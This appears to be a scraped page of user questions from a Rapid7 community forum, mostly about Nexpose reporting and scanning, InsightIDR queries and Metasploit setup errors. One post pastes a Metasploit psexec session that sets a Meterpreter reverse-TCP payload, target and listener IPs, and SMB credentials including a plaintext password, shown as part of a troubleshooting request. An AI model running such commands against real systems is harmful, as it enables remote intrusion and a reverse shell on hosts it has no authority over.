We're not able to manage vulnerabilities and exceptions in Nexpose based on a vulnerability instances's proof, and we were wondering if other companies disregard proof in their vul mgmt programs? If you disregard Proof, what is your rationale? If you use Proof, how are you doing so? See related comment on https://blog.rapid7.com/2015/01/23/the-pudding-is-in-the-proof-the-importance-of-proofs-in-vulnerability-management/ for more about what we think are issues with not incorporating proof into the definition of a vulnerability instance. Maybe we're looking at it all wrong?
Posted by Lauren Babis 10 months ago
Hello all, I need some assistance in a custom SQL query. I'd like to run a report looking for servers (or all assets) only listing vulnerabilities pertaining to the following groups: Java Adobe (Flash, reader, etc.) Microsoft For each of those groups I'd like to have a break down in the risk associated to all of the vulnerabilities per group. So for example the output would be so: Server 1, Risk score - 200,000, Java Risk - 50,000, Adobe Risk - 75,000, Microsoft Risk - 75,000 Please let me know if this is possible via SQL. So far I have only been able to export assets with their total risks associated to them. Thanks!
Posted by Brandon Spencer 10 months ago
Hi, I'm not a programmer, I don't understand what a JSON is, nor do I know the first thing about what an API does or how to use or configure one. I hope to change that someday, but for now I just want to import txt files from different devices on a network and have a program sort each entry of each txt by time so I can see log events of all devices in order by time. Is that possible with your system, and if so, how can I do this? If this isn't what your program was designed to do, could you be so kind to point me in the right direction? I appreciate your help. Kind Regards, Stuart
Posted by Stuart Knight 10 months ago
Hi, I am receiving 'Cannot allocate memory -infocmp (Errno- ENOMEM)' error message on using metasploit. The KALI OS is newly installed on VM with 1.5 GB RAM. I get this error whenever I start firefox and openvpn along with metasploit. Kindly let me know, what should I do to make the tool work. (I have tried reinstalling the OS on VM, still I get same error)
Posted by Akriti Srivastava 10 months ago
Hello, I have searched her and on the web extensively to try and solve this never ending problem. I continue to get this error message: [-] Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 7337? could not connect to server: Connection refused Is the server running on host "localhost" (127.0.0.1) and accepting TCP/IP connections on port 7337? I then exit metasploit and enter in a terminal :~:service postgresql start I then restart metasploit and now get this error: [-] Failed to connect to the database: FATAL: password authentication failed for user "msf3" FATAL: password authentication failed for user "msf3" I am completely out of ideas on what to do. Any help would be extremely appreciated. For the record I am in no way extensively experienced. I am still very new and learning. Thank you again for any help.
Posted by Daniel Guerreiro 10 months ago
We have hundreds of domain names. Some are active, some are old ones we have parked, and others are forwarded to the main sites. Needless to say, it would take some time adding them into the list of trusted domains. However, GoDaddy, name.com and a few others have APIs where InsightIDR could get a periodic list of the domains that are active and we would not need to maintain that list personally. https://developer.godaddy.com/doc https://www.name.com/api_about
Posted by Chris Bachmann 10 months ago
Is there an option to Run a Vulnerabilities Report, that can filter information by the highest CVSS score, highest risk and define it by those Sites in our environment. I am able to run a general vulnerabilities report, but this does not include the Sites in the report.
Posted by Gene 10 months ago
Hi All, Please see the error message when running exploit. It does not seem to get past authentication. msf exploit(windows/smb/psexec) > use exploit/windows/smb/psexec msf exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(windows/smb/psexec) > set RHOST 139.49.19.13 RHOST => 139.49.19.13 msf exploit(windows/smb/psexec) > set LHOST 139.49.153.201 LHOST => 139.49.153.201 msf exploit(windows/smb/psexec) > set SMBDomain CORP SMBDomain => CORP msf exploit(windows/smb/psexec) > set SMBUser "localadmin" SMBUser => localadmin msf exploit(windows/smb/psexec) > set SMBPass "MrPassw0rd" SMBPass => MrPassw0rd msf exploit(windows/smb/psexec) > set LPORT 4444 LPORT => 443 msf exploit(windows/smb/psexec) > exploit [*] Started reverse TCP handler on 139.49.153.201:4444 [*] 139.49.19.13:445 - Connecting to the server... [*] 139.49.19.13:445 - Authenticating to 139.49.19.13:445| as user 'CORP\localadmin'... [-] 139.49.19.13:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: An existing connection was forcibly closed by the remote host. [*] Exploit completed, but no session was created. msf exploit(windows/smb/psexec) > version Framework: 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b Console : 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b I tested authentication by running the sysinternals psexec Outside of metasploit. psexec was successful. C:\Users\Administrator>SysinternalsSuite\PsExec.exe \\139.49.19.13 -u CORP\localadmin cmd PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com Password: Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami CORP\localadmin Same result by using exploit psexec_psh. Please give advice. Thanks. Regards, AA
Posted by aa 11 months ago
Hello, I receive the below error after creating a new site from an imported list of IPs and attempting to run the scan. Failed (Scan failed to start on engine [ID: 10]: /opt/rapid7/nexpose/nse/consoles/1/tmp/10_8893135199960014058: No space left on device) Thanks much in advance.
Posted by Keith Evans 11 months ago
Using Nexpose, is it possible to scan multiple VPCs within a Site. Been attempting to setup a site where more than one VPC is referenced but keep getting error that there are no assets available. I want to confirm if error in my setup or this is not a capability. I'm able to setup 1 VPC per SITE, but needing to combine, for example, all prod - VPCs in one site, all stage- VPCs in one site, etc.
Posted by Selina Zimmerman 11 months ago
Hi, I'm looking for a query that shows me the locked accounts over a specific time frame. This can be done by simple using ACCOUNT_LOCKED in the Active Directory Admin Activity. I can also count the unique locked accounts. However I would like to have a query that checks if an account is locked more than once, in for example an hour instead of receiving an alert each time an account is locked.
Posted by Tom 11 months ago
Is it possible to generate a report with only the selected vulnerabilities? Basically I'm trying to create a summary report excluding the safe and informational vulnerabilities. I tried filtering on severity and then selecting those, but when I generate the report it includes everything.
Posted by Mike Kauspedas 11 months ago
My client's company is making a vulnerability assessment to Nexpose of assets being serviced over AWS. I have entered the Access key and Secret Key to scan AWS assets, but I am unable to retrieve them from the newsose. These are the findings I made during a few tests. 1.When I checked my scan logs, there was no problem locating the assets. This means that AWS keys are not considered problematic. 2. The asset has been viewed successfully, but the scan is failing. Based on what is printed on the UI, it does not appear that the information from the viewed assets can be saved to the site. Please let me know what is wrong and what is the solution. I will attach a screenshot related to the above.
Posted by yryim 11 months ago
I would like to create a template that attempts a host of scenarios that relate to the OWASP T10 of web apps (so XSS, CSRF, SQLi, etc.). The web spidering engine says "It then analyzes this information for evidence of security flaws such as SQL injection, cross-site scripting (CSS/XSS), backup script files, readable CGI scripts, insecure password use, and other issues resulting from software defects or configuration errors" Does this mean its actively testing these things (i.e. validate they are present)? Or just flag if behavior is similar?
Posted by Eric A 11 months ago
Hi, I'm looking for a query that shows me the locked accounts over a specific time frame. This can be done by simple using ACCOUNT_LOCKED in the Active Directory Admin Activity. I can also count the unique locked accounts. However I would like to have a query that checks if an account is locked more than once, in for example an hour instead of receiving an alert each time an account is locked.
Posted by Tom 11 months ago
I'm trying to finalize our scan environment for Nexpose. I have a security controller(a VM) licensed and setup working in order. And due to our geographical diversity I needed to have scan engines setup at various locations also VMs. I have installed the scan engine software on the remote VMs. When I tried to add these newly setup scan engines to the console, I receive an error "scan engine certificate does not match stored certificate". Can you please help resolving this. I have excluded these scan engines from all of our IPS, Firewalls, McAfee HIPS and other devices in our infrastructure. Any prompt response would be greatly apprecaited. Thanks Chakra
Posted by Chakravarthy.mandavilli@ghd.com 11 months ago
Yesterday I notices I couldn't connect to the Nexpose portal. I went to the installed server, and saw the Nespose Security Console Service wasn't running. I clicked start and got an error message: Error 255: the extended attributes are inconsistent. I downloaded and reinstalled the product, and restarted the server, but I still get the same response.
Posted by Dan Guzman 11 months ago